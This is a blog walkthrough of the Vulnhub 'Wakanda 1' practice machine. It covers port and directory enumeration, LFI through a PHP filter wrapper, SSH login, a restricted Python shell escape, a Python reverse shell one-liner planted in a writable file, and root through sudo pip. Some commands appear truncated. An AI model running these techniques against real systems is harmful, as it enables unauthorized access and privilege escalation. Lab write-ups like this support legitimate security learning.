Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub


Wakanda 1 a crazy little box that kick my ass lol since i decided to complete all the OSCP like box on Vulnhubs so today we are solving Wakanda 1 you can easily grab a copy here Wakanda Download Here .

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

└─$ cat nmap.nmap
# Nmap 7.91 scan initiated Wed May 12 03:28:56 2021 as: nmap -p- -sC -sV -oA nmap
Nmap scan report for
Host is up (0.00019s latency).
Not shown: 65531 closed ports
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38725/udp6  status
|   100024  1          51498/tcp   status
|   100024  1          53596/tcp6  status
|_  100024  1          53798/udp   status
3333/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
|   2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
|   256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
|_  256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
51498/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Wed May 12 03:29:11 2021 -- 1 IP address (1 host up) scanned in 14.70 seconds

Some few ports also SSH is running on port 3333 so let check port 80 first .


Intersting let cehck the source code maybe a hint is left behind to trace .


Some interesting comment in the source so i try checking the parameter but it only change the language to french .


Let try some directory brute forcing on the target .

└─$ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
2021/05/12 07:30:39 Starting gobuster in directory enumeration mode
/index.php            (Status: 200) [Size: 1527]
/fr.php               (Status: 200) [Size: 0]   
/admin                (Status: 200) [Size: 0]   
/backup               (Status: 200) [Size: 0]   
/shell                (Status: 200) [Size: 0]   
/secret.txt           (Status: 200) [Size: 40]  
/secret               (Status: 200) [Size: 0]   
/troll                (Status: 200) [Size: 0]   
/server-status        (Status: 403) [Size: 302] 
/hahaha               (Status: 200) [Size: 0]   
/hohoho               (Status: 200) [Size: 0]   
2021/05/12 07:33:35 Finished

Some really interesting directory but all is empty only the secret.txt which is also a troll lol.


Ok going back to the language parameter to test for some LFI vulnerability .


I actually spend hours here to figure out what am missing so i end up peeping at a write up to see what am missing and guess what am actually at the right path but just need a php wrapper fliter for it to work.



And boom we have the index page source code now let try to decode it.


Cool with some credentials since we know the username is mamadou now let log in SSH .

└─$ ssh mamadou@ -p3333
mamadou@'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Wed May 12 05:14:12 2021 from
Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.

And we are in but restricted in python shell now time to break out of it.

import os; os.system("/bin/bash")


And boom and we have the flag1.txt let move on now haahahhahaah .

mamadou@Wakanda1:~$ ls
mamadou@Wakanda1:~$ cd ..
mamadou@Wakanda1:/home$ ls
devops  mamadou
mamadou@Wakanda1:/home$ cd devops
mamadou@Wakanda1:/home/devops$ ls
mamadou@Wakanda1:/home/devops$ cat flag2.txt
cat: flag2.txt: Permission denied

And i was thinking it our lucky day since i have able to get into the devops user folder thinking i have access to the flag2.txt but damn no luck time to move our Privilege.

Privilege Escalation .

Let transfer to our target for quick result .


/srv/ look promising and we have write permission on it.

mamadou@Wakanda1:/tmp$ ls -la /srv/
-rw-r--rw- 1 devops developer 252 May 12 06:12 /srv/

So i decided to add my our reverse shell code payload to the file .

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);


So let start an Ncat listener and wait for shell.

└─$ nc -nvlp 1337
listening on [any] 1337 ...

And boom we have shell .


Let spawn a TTY shell now .

└─$ nc -nvlp 1337
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 58567
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn ("/bin/bash")'
devops@Wakanda1:/$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)

Now let check sudo -l .

devops@Wakanda1:/$ sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip

Time to hit gtfobins .


  1. TF=$(mktemp -d)
  2. echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/
  3. sudo pip install $TF


And we are root so i foget to get the flag2.txt let get it now also with the root.txt .


And the root.txt .


Greeting From Muzec

Back To Home